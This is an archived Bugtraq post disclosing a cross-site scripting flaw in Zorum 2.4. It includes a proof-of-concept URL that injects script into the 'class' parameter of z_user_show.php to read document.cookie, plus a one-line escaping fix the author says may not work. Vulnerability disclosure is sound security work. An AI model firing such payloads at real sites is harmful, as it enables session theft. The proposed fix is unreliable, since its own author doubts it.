Home page logo
/

bugtraq logo Bugtraq mailing list archives

XSS bug in Zorum 2.4
From: Arab VieruZ <arabviersus () hotmail com>
Date: 10 Oct 2002 17:46:58 -0000



Vulnerable systems:
Zorum 2.4

Exploit:
z_user_show.php?method=showuserlink&class=<Scr*ipt>javascript:alert
(document.cookie)</Scr*ipt>&rollid=admin&x=3da59a9da8825&

(without "*")

Solution:
i think that will work , but im not sure

open dbtreelistproperty_method.php and put this code in line 7:

$class = HTMLSpecialChars($class);

i'm a beginer php developer soooory :)

----------------------------------
Arab Vieruz

thanx


  By Date           By Thread  

Current thread:
  • XSS bug in Zorum 2.4 Arab VieruZ (Oct 10)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault